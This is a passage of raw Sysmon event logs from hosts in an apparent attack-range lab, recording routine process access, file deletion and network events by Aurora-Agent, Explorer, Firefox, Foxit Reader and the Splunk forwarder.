Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.790{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.781{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.775{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.767{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.725{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.723{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000043045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.718{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=817DF46BFCD85E051CC788F11B139417,SHA256=8D5EAD386A34638EFDDBEB222579E3F6A2F132E3F78667C4BD0FA0BB86C02654,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043044Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.546{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E499-63C7-3E06-00000000AF02}6872C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043043Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.546{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E499-63C7-3E06-00000000AF02}6872C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043042Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.546{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E499-63C7-3E06-00000000AF02}6872C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 354300x800000000000000016736Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:49.119{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50106-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016738Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:52.569{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54FEB2B954331F9FB12994A171B8FD9D,SHA256=3F8C44DC783EB62CD7CC39540DECFFB6571BA13E38FAD542EF7995D4852767F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.982{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7C5AEC1F3A2D6FBE6363209492F5427,SHA256=148C922C40FDC04750D783F3198573828E732EEC8CA18373EE6820E93F2CB647,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.913{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.913{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7bfb8|C:\Windows\System32\TwinUI.dll+7559d|C:\Windows\System32\TwinUI.dll+75173|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.913{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005708C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.913{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+129aec|C:\Windows\System32\TwinUI.dll+b5774|C:\Windows\System32\TwinUI.dll+b148b|C:\Windows\System32\TwinUI.dll+d178a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.898{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+b7bc2c|C:\Program Files\Mozilla Firefox\xul.dll+f881b0|C:\Program Files\Mozilla Firefox\xul.dll+f86c65|C:\Program Files\Mozilla Firefox\xul.dll+f821a4|C:\Windows\System32\user32.dll+121e4|C:\Windows\System32\user32.dll+11ed7|C:\Windows\System32\user32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFE2E09B)|UNKNOWN(FFFFF3D9DFE2DFD2)|UNKNOWN(FFFFF3D9DFE2CDE7)|UNKNOWN(FFFFF3D9DFEB740A)|UNKNOWN(FFFFF3D9DFEB8173)|UNKNOWN(FFFFF3D9DFEAFD49)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\user32.dll+1ea2e 10341000x800000000000000043078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.898{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.898{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.882{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.882{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+2a5650|C:\Windows\System32\TwinUI.dll+2a7c0a|C:\Windows\System32\TwinUI.dll+2878df|C:\Windows\System32\TwinUI.dll+286d44|C:\Windows\System32\TwinUI.dll+286f67|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000043074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.882{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+58f5f5|C:\Windows\System32\TwinUI.dll+2879a6|C:\Windows\System32\TwinUI.dll+2878b9|C:\Windows\System32\TwinUI.dll+286d44|C:\Windows\System32\TwinUI.dll+286f67|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000043073Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.222{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000043072Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.024{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=6314C94CBCB759E093E87CF16DDF750C,SHA256=37A63CDC42F73C5C0619277B8EA92B5F6D2524F6BB31F746E73D5475A702DCAB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.024{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_vuRRIdIjg2apA76MD5=FE0109DED4C5E04F15B18B137EA79167,SHA256=6D0D04E24999A01508AA3D2395C8A68076A9DA49A61EE870EBB649196588C090,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:52.013{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=456A4AE18078055B9AD700E682262C3F,SHA256=0E10968DB94F9CA7647D3D9E2BCAF061C1223CD82533A4A5BD8CD80B0C5F559B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016739Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:53.646{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E2807A708FAB25F812758450F0BF771,SHA256=A29B9F3BD80230EF30267F5C1EAA0ADD3090A5312E821815F3EBB0060904AC5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:53.983{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e8e1a7|C:\Program Files\Mozilla Firefox\xul.dll+831d2a|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a93e85|C:\Program Files\Mozilla Firefox\xul.dll+1a968e2|C:\Program Files\Mozilla Firefox\xul.dll+17d2563|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|UNKNOWN(000003E2E136109C) 23542300x800000000000000043088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 